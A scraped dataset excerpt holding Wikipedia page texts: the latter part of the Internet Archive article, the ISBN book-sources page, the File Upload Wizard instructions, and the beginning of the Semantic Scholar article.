35 a donation of 250,000 books from Trent University in 2018, 36 and the entire collection of Marygrove College's library in 2020 after it closed. 37 All material is then digitized and retained in digital storage, while a digital copy is returned to the original holder and the Internet Archive's copy, if not in the public domain, is lent to patrons worldwide one at a time under the controlled digital lending (CDL) theory of the first-sale doctrine. 38 During the week of May 27, 2024, The Internet Archive suffered a series of distributed denial of service (DDoS) attacks that made its services unavailable intermittently, sometimes for hours at a time, over a period of several days. 39 40 41 The Archive is a 501(c)(3) nonprofit operating in the United States. In 2019, it had an annual budget of $36 million, derived from revenue from its Web crawling services, various partnerships, grants, donations, and the Kahle-Austin Foundation. 42 The Internet Archive also manages periodic funding campaigns. For instance, a December 2019 campaign had a goal of reaching $6 million in donations. 43 The Archive is headquartered in San Francisco, California. From 1996 to 2009, its headquarters were in the Presidio of San Francisco, a former U.S. military base. Since 2009, its headquarters have been at 300 Funston Avenue in San Francisco, a former Christian Science Church. At one time, most of its staff worked in its book-scanning centers; as of 2019, scanning is performed by 100 paid operators worldwide. 44 The Archive also has data centers in three Californian cities: San Francisco, Redwood City, and Richmond. To reduce the risk of data loss, the Archive creates copies of parts of its collection at more distant locations, including the Bibliotheca Alexandrina 45 46 in Egypt and a facility in Amsterdam. 47 The Archive is a member of the International Internet Preservation Consortium 48 and was officially designated as a library by the state of California in 2007. 49 50 The Internet Archive capitalized on the popular use of the term "WABAC Machine" from a segment of The Adventures of Rocky and Bullwinkle cartoon (specifically, Peabody's Improbable History), and uses the name "Wayback Machine" for its service that allows archives of the World Wide Web to be searched and accessed. 51 This service allows users to view some of the archived web pages. The Wayback Machine was created as a joint effort between Alexa Internet (owned by Amazon.com) and the Internet Archive when a three-dimensional index was built to allow for the browsing of archived web content. 52 Hundreds of billions of web sites and their associated data (images, source code, documents, etc.) are saved in a database. The service can be used to see what previous versions of web sites used to look like, to grab original source code from web sites that may no longer be directly available, or to visit web sites that no longer even exist. Not all web sites are available because many web site owners choose to exclude their sites. As with all sites based on data from web crawlers, the Internet Archive misses large areas of the web for a variety of other reasons. A 2004 paper found international biases in the coverage, but deemed them "not intentional". 53 In 2017, the Wayback Machine director announced that its crawlers would ignore robots.txt instructions and archive pages even if website owners asked bots not to access them. 54 A "Save Page Now" archiving feature was made available in October 2013, 55 accessible on the lower right of the Wayback Machine's main page. 56 Once a target URL is entered and saved, the web page will become part of the Wayback Machine. 55 Through the Internet address web.archive.org, 57 users can upload to the Wayback Machine a large variety of contents, including PDF and data compression file formats. The Wayback Machine creates a permanent local URL of the upload content, that is accessible in the web, even if not listed while searching in the https: archive.org official website. In October 2016, it was announced that the way web pages are counted would be changed, resulting in the decrease of the archived pages counts shown. Embedded objects such as pictures, videos, style sheets, JavaScripts are no longer counted as a "web page", whereas HTML, PDF, and plain text documents remain counted. 58 In September 2020, the Internet Archive announced a partnership with Cloudflare an American content delivery network service provider to automatically index websites served via its "Always Online" services. 81 Created in early 2006, Archive-It 82 is a web archiving subscription service that allows institutions and individuals to build and preserve collections of digital content and create digital archives. Archive-It allows the user to customize their capture or exclusion of web content they want to preserve for cultural heritage reasons. Through a web application, Archive-It partners can harvest, catalog, manage, browse, search, and view their archived collections. 83 In terms of accessibility, the archived web sites are full text searchable within seven days of capture. 84 Content collected through Archive-It is captured and stored as a WARC file. A primary and back-up copy is stored at the Internet Archive data centers. A copy of the WARC file can be given to subscribing partner institutions for geo-redundant preservation and storage purposes to their best practice standards. 85 Periodically, the data captured through Archive-It is indexed into the Internet Archive's general archive. As of March 2014 update , Archive-It had more than 275 partner institutions in 46 U.S. states and 16 countries that have captured more than 7.4 billion URLs for more than 2,444 public collections. Archive-It partners are universities and college libraries, state archives, federal institutions, museums, law libraries, and cultural organizations, including the Electronic Literature Organization, North Carolina State Archives and Library, Stanford University, Columbia University, American University in Cairo, Georgetown Law Library, and many others. In September 2020 Internet Archive announced a new initiative to archive and preserve open access academic journals, called Internet Archive Scholar. 86 87 88 Its full-text search index includes over 25 million research articles and other scholarly documents preserved in the Internet Archive. The collection spans from digitized copies of eighteenth century journals through the latest open access conference proceedings and pre-prints crawled from the World Wide Web. In 2021, the Internet Archive announced the initial version of the General Index, a publicly available index to a collection of 107 million academic journal articles. 89 90 The scanning performed by the Internet Archive is financially supported by libraries and foundations. 91 As of November 2008 update , when there were approximately 1 million texts, the entire collection was greater than 0.5 petabytes, which included raw camera images, cropped and skewed images, PDFs, and raw OCR data. 92 As of July 2013 update , the Internet Archive was operating 33 scanning centers in five countries, digitizing about 1,000 books a day for a total of more than 2 million books, in a total collection of 4.4 million books including material digitized by others and fed into the Internet Archive; at that time, users were performing more than 15 million downloads per month. 93 The material digitized by others includes more than 300,000 books that were contributed to the collection, between about 2006 and 2008, by Microsoft through its Live Search Books project, which also included financial support and scanning equipment directly donated to the Internet Archive. 94 On May 23, 2008, Microsoft announced it would be ending its Live Book Search project and would no longer be scanning books, donating its remaining scanning equipment to its former partners. 94 Around October 2007, Archive users began uploading public domain books from Google Book Search. 95 As of November 2013 update , there were more than 900,000 Google-digitized books in the Archive's collection; 96 the books are identical to the copies found on Google, except without the Google watermarks, and are available for unrestricted use and download. a Brewster Kahle revealed in 2013 that this archival effort was coordinated by Aaron Swartz, who, with a "bunch of friends", downloaded the public domain books from Google slowly enough and from enough computers to stay within Google's restrictions. They did this to ensure public access to the public domain. The Archive ensured the items were attributed and linked back to Google, which never complained, while libraries "grumbled". According to Kahle, this is an example of Swartz's "genius" to work on what could give the most to the public good for millions of people. 97 In addition to books, the Archive offers free and anonymous public access to more than four million court opinions, legal briefs, or exhibits uploaded from the United States Federal Courts' PACER electronic document system via the RECAP web browser plugin. These documents had been kept behind a federal court paywall. On the Archive, they had been accessed by more than six million people by 2013. 97 The Archive's BookReader web app, 98 built into its website, has features such as single-page, two-page, and thumbnail modes; fullscreen mode; page zooming of high-resolution images; and flip page animation. 98 99 The Open Library is another project of the Internet Archive. The project seeks to include a web page for every book ever published: it holds 25 million catalog records of editions. It also seeks to be a web-accessible public library: it contains the full texts of approximately 1,600,000 public domain books (out of the more than five million from the main texts collection), as well as in-print and in-copyright books, 100 many of which are fully readable, downloadable 101 102 and full-text searchable; 103 it offers a two-week loan of e-books in its controlled digital lending program for over 647,784 books not in the public domain, in partnership with over 1,000 library partners from six countries 93 104 after a free registration on the web site. Open Library is a free and open-source software project, with its source code freely available on GitHub. The Open Library faces objections from some authors and the Society of Authors, who hold that the project is distributing books without authorization and is thus in violation of copyright laws, 105 and four major publishers initiated a copyright infringement lawsuit against the Internet Archive in June 2020 to stop the Open Library project. 106 Many large institutional sponsors have helped the Internet Archive provide millions of scanned publications (text items). 107 Some sponsors that have digitized large quantities of texts include the University of Toronto's Robarts Library, the University of Alberta Libraries, the University of Ottawa, the Library of Congress, Boston Library Consortium member libraries, the Boston Public Library, the Princeton Theological Seminary Library, and many others. 108 In 2017, the MIT Press authorized the Internet Archive to digitize and lend books from the press's backlist, 109 with financial support from the Arcadia Fund. 110 111 A year later, the Internet Archive received further funding from the Arcadia Fund to invite some other university presses to partner with the Internet Archive to digitize books, a project called "Unlocking University Press Books". 112 113 The Library of Congress created numerous Handle System identifiers that pointed to free digitized books in the Internet Archive. 114 The Internet Archive and Open Library are listed on the Library of Congress website as a source of e-books. 115 In addition to web archives, the Internet Archive maintains extensive collections of digital media that are attested by the uploader to be in the public domain in the United States or licensed under a license that allows redistribution, such as Creative Commons licenses. Media are organized into collections by media type (moving images, audio, text, etc.), and into sub-collections by various criteria. Each of the main collections includes a "Community" sub-collection (formerly named "Open Source") where general contributions by the public are stored. The Audio Archive is an audio archive that includes music, audiobooks, news broadcasts, old time radio shows, podcasts, and a wide variety of other audio files. As of January 2023 update , there are more than 15,000,000 free digital recordings in the collection. The subcollections include audio books and poetry, podcasts, non-English audio, and many others. 116 The sound collections are curated by B. George, director of the ARChive of Contemporary Music. 117 Next to the stock HTML5 audio player, Winamp-resembling Webamp is available. A project to preserve recordings of amateur radio transmissions, with funding from the Amateur Radio Digital Communications foundation. 118 119 The Live Music Archive sub-collection includes more than 170,000 concert recordings from independent musicians, as well as more established artists and musical ensembles with permissive rules about recording their concerts, such as the Grateful Dead, and more recently, The Smashing Pumpkins. Also, Jordan Zevon has allowed the Internet Archive to host a definitive collection of his father Warren Zevon's concert recordings. The Zevon collection ranges from 1976 to 2001 and contains 126 concerts including 1,137 songs. 120 The Great 78 Project aims to digitize 250,000 78 rpm singles (500,000 songs) from the period between 1880 and 1960, donated by various collectors and institutions. It has been developed in collaboration with the Archive of Contemporary Music and George Blood Audio, responsible for the audio digitization. 117 The Archive has a collection of freely distributable music that is streamed and available for download via its Netlabels service. The music in this collection generally has Creative Commons-license catalogs of virtual record labels. 121 122 This collection contains more than 3.5 million items. 123 Cover Art Archive, Metropolitan Museum of Art Gallery Images, NASA Images, Occupy Wall Street Flickr Archive, and USGS Maps are some sub-collections of Image collection. The Cover Art Archive is a joint project between the Internet Archive and MusicBrainz, whose goal is to make cover art images on the Internet. As of April 2021, update this collection contains more than 1,400,000 items. 124 The images of this collection are from the Metropolitan Museum of Art. This collection contains more than 140,000 items. 125 The NASA Images archive was created through a Space Act Agreement between the Internet Archive and NASA to bring public access to NASA's image, video, and audio collections in a single, searchable resource. The IA NASA Images team worked closely with all of the NASA centers to keep adding to the ever-growing collection. 126 The nasaimages.org site launched in July 2008 and had more than 100,000 items online at the end of its hosting in 2012. This collection contains Creative Commons-licensed photographs from Flickr related to the Occupy Wall Street movement. This collection contains more than 15,000 items. 127 This collection contains more than 59,000 items from Libre Map Project. 128 One of the sub-collections of the Internet Archive's Video Archive is the Machinima Archive. This small section hosts many Machinima videos. Machinima is a digital artform in which computer games, game engines, or software engines are used in a sandbox-like mode to create motion pictures, recreate plays, or even publish presentations or keynotes. The archive collects a range of Machinima films from internet publishers such as Rooster Teeth and Machinima.com as well as independent producers. The sub-collection is a collaborative effort among the Internet Archive, the How They Got Game research project at Stanford University, the Academy of Machinima Arts and Sciences, and Machinima.com. 129 This collection contains approximately 160,000 microfilmed items from a variety of libraries including the University of Chicago Libraries, the University of Illinois at Urbana-Champaign, the University of Alberta, Allen County Public Library, and the National Technical Information Service. 130 131 The Internet Archive holds a collection of approximately 3,863 feature films. 132 Additionally, the Internet Archive's Moving Image collection includes: newsreels, classic cartoons, pro- and anti-war propaganda, The Video Cellar Collection, Skip Elsheimer's "A.V. Geeks" collection, early television, and ephemeral material from Prelinger Archives, such as advertising, educational, and industrial films, as well as amateur and home movie collections. Subcategories of this collection include: Open Educational Resources is a digital collection at archive.org. This collection contains hundreds of free courses, video lectures, and supplemental materials from universities in the United States and China. The contributors of this collection are ArsDigita University, Hewlett Foundation, MIT, Monterey Institute, and Naropa University. 135 In September 2012, the Internet Archive launched the TV News Search Borrow service for searching U.S. national news programs. 136 The service is built on closed captioning transcripts and allows users to search and stream 30 second video clips. Upon launch, the service contained "350,000 news programs collected over 3 years from national U.S. networks and stations in San Francisco and Washington D.C. 137 According to Kahle, the service was inspired by the Vanderbilt Television News Archive, a similar library of televised network news programs. 138 In contrast to Vanderbilt, which limits access to streaming video to individuals associated with subscribing colleges and universities, the TV News Search Borrow allows open access to its streaming video clips. In 2013, the Archive received an additional donation of "approximately 40,000 well-organized tapes" from the estate of a Philadelphia woman, Marion Stokes. Stokes "had recorded more than 35 years of TV news in Philadelphia and Boston with her VHS and Betamax machines. 139 Brooklyn Museum collection contains approximately 3,000 items from Brooklyn Museum. 140 In December 2020, the film research library of Lillian Michelson was donated to the archive. 141 Voicing a strong reaction to the idea of books simply being thrown away, and inspired by the Svalbard Global Seed Vault, Kahle now envisions collecting one copy of every book ever published. "We're not going to get there, but that's our goal", he said. Alongside the books, Kahle plans to store the Internet Archive's old servers, which were replaced in 2010. 142 The Internet Archive has "the largest collection of historical software online in the world", spanning 50 years of computer history in terabytes of computer magazines and journals, books, shareware discs, FTP sites, video games, etc. The Internet Archive has created an archive of what it describes as "vintage software", as a way to preserve them. 143 The project advocated for an exemption from the United States Digital Millennium Copyright Act to permit them to bypass copy protection, which the United States Copyright Office approved in 2003 for a period of three years. 144 The Archive does not offer the software for download, as the exemption is solely "for the purpose of preservation or archival reproduction of published digital works by a library or archive. 145 The Library of Congress renewed the exemption in 2006, and in 2009 indefinitely extended it pending further rulemakings. 146 The Library reiterated the exemption as a "Final Rule" with no expiration date in 2010. 147 In 2013, the Internet Archive began to provide select video games browser-playable via MESS, for instance the Atari 2600 game E.T. the Extra-Terrestrial. 148 Since December 23, 2014, the Internet Archive presents, via a browser-based DOSBox emulation, thousands of DOS PC games 149 150 151 152 for "scholarship and research purposes only". 153 154 155 In November 2020, the Archive introduced a new emulator for Adobe Flash called Ruffle, and began archiving Flash animations and games ahead of the December 31, 2020, end-of-life for the Flash plugin across all computer systems. 156 A combined hardware software system has been developed that performs a safe method of digitizing content. 157 158 From 2012 to November 2015, the Internet Archive operated the Internet Archive Federal Credit Union, a federal credit union based in New Brunswick, New Jersey, with the goal of providing access to low- and middle-income people. Throughout its short existence, the IAFCU experienced significant conflicts with the National Credit Union Administration, which severely limited the IAFCU's loan portfolio and concerns over serving Bitcoin firms. At the time of its dissolution, it consisted of 395 members and was worth $2.5 million. 159 160 Since 2019, 161 the Internet Archive organizes an event called Decentralized Web Camp (DWeb Camp). It is an annual camp that brings together a diverse global community of contributors in a natural setting. The camp aims to tackle real-world challenges facing the web and co-create decentralized technologies for a better internet. It aims to foster collaboration, learning, and fun while promoting principles of trust, human agency, mutual respect, and ecological awareness. 162 On 30 September 2021, as a part of its 25th anniversary celebration, Internet Archive launched the "Wayforward Machine", a satirical, fictional website covered with pop-ups asking for personal information. The site was intended to depict a fictional dystopian timeline of real-world events leading to such a future, such as the repeal of Section 230 of the United States Code in 2022 and the introduction of advertising implants in 2041. 163 164 The Great Room of the Internet Archive features a collection of more than 100 ceramic figures representing employees of the Internet Archive, with the 100th statue immortalizing Aaron Swartz. This collection, inspired by the statues of the Xian warriors in China, was commissioned by Brewster Kahle, sculpted by Nuala Creed, and as of 2014, is ongoing. 165 The Internet Archive visual arts residency, 166 organized by Amir Saber Esfahani, is designed to connect emerging and mid-career artists with the Archive's millions of collections and to show what is possible when open access to information intersects with the arts. During this one-year residency, selected artists develop a body of work that responds to and utilizes the Archive's collections in their own practice. 167 On May 8, 2008, it was revealed that the Internet Archive had successfully challenged an FBI national security letter asking for logs on an undisclosed user. 171 172 On November 28, 2016, it was revealed that a second FBI national security letter had been successfully challenged that had been asking for logs on another undisclosed user. 173 The Internet Archive blacked out its web site for 12 hours on January 18, 2012, in protest of the Stop Online Piracy Act and the PROTECT IP Act bills, two pieces of legislation in the United States Congress that they argued would "negatively affect the ecosystem of web publishing that led to the emergence of the Internet Archive". This occurred in conjunction with the English Wikipedia blackout, as well as numerous other protests across the Internet. 174 The Internet Archive is a member of the Open Book Alliance, which has been among the most outspoken critics of the Google Book Settlement. The Archive advocates an alternative digital library project. 175 On October 9, 2016, the Internet Archive was temporarily blocked in Turkey after it was used (amongst other file hosting services) by hackers to host 17 GB of leaked government emails. 176 177 Because the Internet Archive only lightly moderates uploads, it includes resources that may be valued by extremists and the site may be used by them to evade block listing. In February 2018, the Counter Extremism Project said that the Archive hosted terrorist videos, including the beheading of Alan Henning, and had declined to respond to requests about the videos. 178 In May 2018, a report published by the cyber-security firm Flashpoint stated that the Islamic State was using the Internet Archive to share its propaganda. 179 Chris Butler, from the Internet Archive, responded that they regularly spoke to the US and EU governments about sharing information on terrorism. 179 In April 2019, Europol, acting on a referral from French police, asked the Internet Archive to remove 550 sites of "terrorist propaganda". 180 The Archive rejected the request, saying that the reports were wrong about the content they pointed to, or were too broad for the organization to comply with. 180 On July 14, 2021, the Internet Archive held a joint "Referral Action Day" with Europol to target terrorist videos. 181 A 2021 article said that jihadists regularly used the Internet Archive for "dead drops" of terrorist videos. 182 In January 2022, a former UCLA lecturer's 800 page manifesto, containing racist ideas and threats against UCLA staff, was uploaded to the Internet Archive. 183 The manifesto was removed by the Internet Archive after a week, amidst discussion about whether such documents should be preserved by archivists or not. 183 Another 2022 paper found "an alarming volume of terrorist, extremist, and racist material on the Internet Archive". 184 A 2023 paper reported that Neo-Nazis collect links to online, publicly available resources to be shared with new recruits. As the Internet Archive hosts uploaded texts that are not allowed on other websites, Nazi and neo-Nazi books in the Archive (e.g., The Turner Diaries) frequently appear on these lists. These lists also feature older, public domain material created when white supremacist views were more mainstream. 185 In the midst of the COVID 19 pandemic which closed many schools, universities, and libraries, the Archive announced on March 24, 2020, that it was creating the National Emergency Library by removing the lending restrictions it had in place for 1.4 million digitized books in its Open Library but otherwise limiting users to the number of books they could check out and enforcing their return; normally, the site would only allow one digital lending for each physical copy of the book they had, by use of an encrypted file that would become unusable after the lending period was completed. 4 This Library would remain as such until at least June 30, 2020, or until the US national emergency was over, whichever came later. 186 At launch, the Internet Archive allowed authors and rightholders to submit opt-out requests for their works to be omitted from the National Emergency Library. 187 188 189 The Internet Archive said the National Emergency Library addressed an "unprecedented global and immediate need for access to reading and research material" due to the closures of physical libraries worldwide. 190 They justified the move in a number of ways. Legally, they said they were promoting access to those inaccessible resources, which they claimed was an exercise in fair use principles. The Archive continued implementing their controlled digital lending policy that predated the National Emergency Library, meaning they still encrypted the lent copies and it was no easier for users to create new copies of the books than before. An ultimate determination of whether or not the National Emergency Library constituted fair use could only be made by a court. Morally, they also pointed out that the Internet Archive was a registered library like any other, that they either paid for the books themselves or received them as donations, and that lending through libraries predated copyright restrictions. 187 191 The Archive had already been criticized by authors and publishers for its prior lending approach, and upon announcement of the National Emergency Library, authors, publishers, and groups representing both took further issue with The Archive and its Open Library project, equating the move to copyright infringement and digital piracy, and using the COVID 19 pandemic as a reason to push the boundaries of copyright. 189 192 193 194 After the works of some of these authors were ridiculed in responses, the Internet Archive's Jason Scott requested that supporters of the National Emergency Library not denigrate anyone's books: "I realize there's strong debate and disagreement here, but books are life-giving and life-changing and these writers made them. 195 In November 2005, free downloads of Grateful Dead concerts were removed from the site, following what seemed to be disagreements between some of the former band members. John Perry Barlow identified Bob Weir, Mickey Hart, and Bill Kreutzmann as the instigators of the change, according to an article in The New York Times. 196 Phil Lesh, a founding member of the band, commented on the change in a November 30, 2005, posting to his personal web site: It was brought to my attention that all of the Grateful Dead shows were taken down from Archive.org right before Thanksgiving. I was not part of this decision making process and was not notified that the shows were to be pulled. I do feel that the music is the Grateful Dead's legacy and I hope that one way or another all of it is available for those who want it. 197 A November 30 forum post from Brewster Kahle summarized what appeared to be the compromise reached among the band members. Audience recordings could be downloaded or streamed, but soundboard recordings were to be available for streaming only. Concerts have since been re-added. 198 In February 2016, Internet Archive users had begun archiving digital copies of Nintendo Power, Nintendo's official magazine for their games and products, which ran from 1988 to 2012. The first 140 issues had been collected, before Nintendo had the archive removed on August 8, 2016. In response to the take-down, Nintendo told gaming website Polygon, Nintendo must protect our own characters, trademarks and other content. The unapproved use of Nintendo's intellectual property can weaken our ability to protect and preserve it, or to possibly use it for new projects". 199 In August 2017, the Department of Telecommunications of the Government of India blocked the Internet Archive along with other file-sharing websites, in accordance with two court orders issued by the Madras High Court, 200 citing piracy concerns after copies of two Bollywood films were allegedly shared via the service. 201 The HTTP version of the Archive was blocked but it remained accessible using the HTTPS protocol. 200 In 2023, the Internet Archive became a popular site for Indians to watch the first episode of India: The Modi Question, a BBC documentary. 202 The video was reported to have been removed by the Archive on January 23. 202 The Internet Archive then stated, on January 27, that they had removed the video in response to a BBC request under the Digital Millennium Copyright Act. 203 The Great 78 Project had been started on the Internet Archive to store digitized versions of pre 1972 songs and albums from 78 rpm phonograph records, for the stated purpose of "the preservation, research and discovery of 78rpm records". The project had started in 2016, at which time the copyright on pre 1972 recordings only had limited duration; in 2019, the U.S. Congress passed the Music Modernization Act which extended pre 1972 recording copyrights to 2067. In August 2023, Sony Music Entertainment and five other major music publishers sued the Internet Archive over the Great 78 Project, asserting the project was engaged in copyright infringement, denying the claim about research purposes since all the music was available via their respective digital and streaming music services. The companies were seeking the statutory damages for nearly 2500 songs named in the suit, for a total of $347 million. 204 The Internet Archive has argued that the crackles and pops in the recordings mean that it is within the doctrine of "fair use" to digitize them for preservation. The plaintiffs said in response, "if ever there were a theory of fair use invented for litigation, this is it". 205 The operation of the National Emergency Library was part of a lawsuit filed against the Internet Archive by four major book publishers—Hachette, HarperCollins, John Wiley Sons, and Penguin Random House—in June 2020, challenging the copyright validity of the controlled digital lending program. 4 106 206 In response, the Internet Archive closed the National Emergency Library on June 16, 2020, rather than the planned June 30, 2020, due to the lawsuit. 207 208 The plaintiffs, supported by the Copyright Alliance, 209 claimed in their lawsuit that the Internet Archive's actions constituted a "willful mass copyright infringement". 210 In August 2020 the lawsuit trial was tentatively scheduled to begin in November 2021. 211 By June 2022, both parties to the case requested summary judgment for the case, each favoring their respective sides, which Judge John G. Koeltl approved of a summary judgment hearing to take place later in 2022. 212 No summary judgment was issued, and instead a first hearing was held on March 20, 2023. 213 Over the course of the hearing, Judge John G. Koeltl appeared unmoved by the IA's fair use claims and unconvinced that the publishers' market for library e-books was not impacted by their practice. 214 Senator Thom Tillis of North Carolina, chairman of the intellectual property subcommittee on the Senate Judiciary Committee, said in a letter to the Internet Archive that he was "concerned that the Internet Archive thinks that it—not Congress—gets to determine the scope of copyright law". 210 As part of its response to the publishers' lawsuit, in late 2020 the Archive launched a campaign called Empowering Libraries (hashtag EmpoweringLibraries) that portrayed the lawsuit as a threat to all libraries. 215 In a 2021 preprint article, Argyri Panezi argued that the case "presents two important, but separate questions related to the electronic access to library works; first, it raises questions around the legal practice of digital lending, and second, it asks whether emergency use of copyrighted material might be fair use" and argued that libraries have a public service role to enable "future generations to keep having equal access—or opportunities to access—a plurality of original sources". 216 In December 2020, Publishers Weekly included the lawsuit among its "Top 10 Library Stories of 2020". 217 Judge Koeltl ruled on March 24, 2023, against Internet Archive in the case, saying the National Emergency Library concept was not fair use, so the Archive infringed their copyrights by lending out the books without the waitlist restriction. An agreement was then reached for the Internet Archive to pay an undisclosed amount to the publishers. 218 The Internet Archive said afterwards it would appeal this ruling, but otherwise would continue other digital book services which have been previously cleared under case law, such as books for reading-impaired users. 219 220 An updated report of the appeal process involving the Internet Archive was published on December 18, 2023, by TorrentFreak News. 221 While the Archive has appealed the ruling, it has also removed more than 500,000 books from these publishers to comply with the ruling. 222 |
643 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:BookSources/978-1-5386-8260-9 | This page allows users to search multiple sources for a book given a 10 or 13 digit International Standard Book Number. Spaces and dashes in the ISBN do not matter. This page links to catalogs of libraries, booksellers, and other book sources where you will be able to search for the book by its International Standard Book Number (ISBN). Google Books and Amazon.com may be helpful if you want to verify citations in Wikipedia articles, because they often let you search an online version of the book for specific words or phrases, or you can browse through the book (although for copyright reasons the entire book is usually not available). At the Open Library (part of the Internet Archive) you can borrow and read entire books online. Alabama California Colorado Connecticut Delaware Florida Georgia Illinois Indiana Iowa Kansas Kentucky Massachusetts Michigan Minnesota Missouri Nebraska New Jersey New Mexico New York North Carolina Ohio Oklahoma Oregon Pennsylvania Rhode Island South Carolina South Dakota Tennessee Texas Utah Washington state Wisconsin Find your book on a site that compiles results from other online sites: These sites allow you to search the catalogs of many individual booksellers: If the book you are looking for is in a language other than English, you might find it helpful to look at the equivalent pages on other Wikipedias, linked below they are more likely to have sources appropriate for that language. The WorldCat xISBN tool for finding other editions is no longer available. However, there is often a "view all editions" link on the results page from an ISBN search. Google books often lists other editions of a book and related books under the "about this book" link. You can convert between 10 and 13 digit ISBNs with these tools: Get free access to research Research tools and services Outreach Get involved |
644 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Wikipedia:File_upload_wizard | Thank you for offering to contribute an image or other media file for use on Wikipedia. This wizard will guide you through a questionnaire prompting you for the appropriate copyright and sourcing information for each file. Please ensure you understand copyright and the image use policy before proceeding. Uploads to Wikimedia Commons Upload a non-free file Uploads locally to the English Wikipedia; must comply with the non-free content criteria You do not have JavaScript enabled Sorry, in order to use this uploading script, JavaScript must be enabled. You can still use the plain Special:Upload page to upload files to the English Wikipedia without JavaScript. You are not currently logged in. Sorry, in order to use this uploading script and to upload files, you need to be logged in with your named account. Please log in and then try again. Your account has not become confirmed yet. Sorry, in order to upload files on the English Wikipedia, you need to have a confirmed account. Normally, your account will become confirmed automatically once you have made 10 edits and four days have passed since you created it. You may already be able to upload files on the Wikimedia Commons, but you can't do it on the English Wikipedia just yet. If the file you want to upload has a free license, please go to Commons and upload it there. Important note: if you don't want to wait until you are autoconfirmed, you may ask somebody else to upload a file for you at Wikipedia:Files for upload. In very rare cases an administrator may make your account confirmed manually through a request at Wikipedia:Requests for permissions Confirmed. Sorry, a few special characters and character combinations cannot be used in the filename for technical reasons. This goes especially for : and . Your filename has been modified to avoid these. Please check if it is okay now. The filename you chose seems to be very short, or overly generic. Please don't use: A file of this name already exists on Commons If you upload your file with this name, you will be masking the existing file and make it inaccessible. Your new file will be displayed everywhere the existing file was previously used. This should not be done, except in very rare exceptional cases. Please don't upload your file under this name, unless you seriously know what you are doing. Choose a different name for your new file instead. A file of this name already exists. If you upload your file with this name, you will be overwriting the existing file. Your new file will be displayed everywhere the existing file was previously used. Please don't do this, unless you have a good reason to: It is very important that you read through the following options and questions, and provide all required information truthfully and carefully. Thank you for offering to upload a free work. Wikipedia loves free files. However, we would love it even more if you uploaded them on our sister project, the Wikimedia Commons. Files uploaded on Commons can be used immediately here on Wikipedia as well as on all its sister projects. Uploading files on Commons works just the same as here. Your Wikipedia account will automatically work on Commons too. Please consider uploading your file on Commons. However, if you prefer to do it here instead, you may go ahead with this form. You can also first use this form to collect the information about your file and then send it to Commons from here. Please note that by "entirely self-made" we really mean just that. Do not use this section for any of the following: Editors who falsely declare such items as their "own work" will be blocked from editing. Use this only if there is an explicit licensing statement in the source. The website must explicitly say that the image is released under a license that allows free re-use for any purpose, e.g. the Creative Commons Attribution license. You must be able to point exactly to where it says this. If the source website doesn't say so explicitly, please do not upload the file. Public Domain means that nobody owns any copyrights on this work. It does not mean simply that it is freely viewable somewhere on the web or that it has been widely used by others. This is not for images you simply found somewhere on the web. Most images on the web are under copyright and belong to somebody, even if you believe the owner won't care about that copyright. If it is in the public domain, you must be able to point to an actual law that makes it so. If you can't point to such a law but merely found this image somewhere, then please do not upload it. Please remember that you will need to demonstrate that: This file will be used in the following article: Enter the name of exactly one Wikipedia article, without the ... brackets and without the "http: en.wikipedia.org ... URL code. It has to be an actual article, not a talkpage, template, user page, etc. If you plan to use the file in more than one article, please name only one of them here. Then, after uploading, open the image description page for editing and add your separate explanations for each additional article manually. Example article okay. This article doesn't exist The article Example could not be found. Please check the spelling, and make sure you enter the name of an existing article in which you will include this file. If this is an article you are only planning to write, please write it first and upload the file afterwards. This is not an actual encyclopedia article The page Example is not in the main article namespace. Non-free files can only be used in mainspace article pages, not on a user page, talk page, template, etc. Please upload this file only if it is going to be used in an actual article. If this page is an article draft in your user space, we're sorry, but we must ask you to wait until the page is ready and has been moved into mainspace, and only upload the file after that. This is a disambiguation page The page Example is not a real article, but a disambiguation page pointing to a number of other pages. Please check and enter the exact title of the actual target article you meant. If neither of these two statements applies, then please do not upload this image. This section is not for images used merely to illustrate an article about a person or thing, showing what that person or thing look like. In view of this, please explain how the use of this file will be minimal. Well, we're very sorry, but if you're not sure about this file's copyright status, or if it doesn't fit into any of the groups above, then: Please don't upload it. Really, please don't. Even if you think it would make for a great addition to an article. We really take these copyright rules very seriously on Wikipedia. Note that media is assumed to be fully-copyrighted unless shown otherwise; the burden is on the uploader. In particular, please don't upload: If you are in any doubt, please ask some experienced editors for advice before uploading. People will be happy to assist you at Wikipedia:Media copyright questions. Thank you. This is the data that will be submitted to upload: Your file is being uploaded. This might take a minute or two, depending on the size of the file and the speed of your internet connection. Once uploading is completed, you will find your new file at this link: File:Example.jpg Your file has been uploaded successfully and can now be found here: File:Example.jpg Please follow the link and check that the image description page has all the information you meant to include. If you want to change the description, just go to the image page, click the "edit" tab at the top of the page and edit just as you would edit any other page. Do not go through this upload form again, unless you want to replace the actual file with a new version. To insert this file into an article, you may want to use code similar to the following: If you wish to make a link to the file in text, without actually showing the image, for instance when discussing the image on a talk page, you can use the following (mark the : after the initial brackets ): See Wikipedia:Picture tutorial for more detailed help on how to insert and position images in pages. Thank you for using the File Upload Wizard.Please leave your feedback, comments, bug reports or suggestions on the talk page. |
645 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/S2CID_(identifier) | Semantic Scholar is a research tool for scientific literature powered by artificial intelligence. It is developed at the Allen Institute for AI and was publicly released in November 2015. 2 Semantic Scholar uses modern techniques in natural language processing to support the research process, for example by providing automatically generated summaries of scholarly papers. 3 The Semantic Scholar team is actively researching the use of artificial intelligence in natural language processing, machine learning, human computer interaction, and information retrieval. 4 Semantic Scholar began as a database for the topics of computer science, geoscience, and neuroscience. 5 In 2017, the system began including biomedical literature in its corpus. 5 As of September 2022 update , it includes over 200 million publications from all fields of science. 6 Semantic Scholar provides a one-sentence summary of scientific literature. One of its aims was to address the challenge of reading numerous titles and lengthy abstracts on mobile devices. 7 It also seeks to ensure that the three million scientific papers published yearly reach readers, since it is estimated that only half of this literature is ever read. 8 Artificial intelligence is used to capture the essence of a paper, generating it through an "abstractive" technique. 3 The project uses a combination of machine learning, natural language processing, and machine vision to add a layer of semantic analysis to the traditional methods of citation analysis, and to extract relevant figures, tables, entities, and venues from papers. 9 10 Another key AI-powered feature is Research Feeds, an adaptive research recommender that uses AI to quickly learn what papers users care about reading and recommends the latest research to help scholars stay up to date. It uses a state-of-the-art paper embedding model trained using contrastive learning to find papers similar to those in each Library folder. 11 Semantic Scholar also offers Semantic Reader, an augmented reader 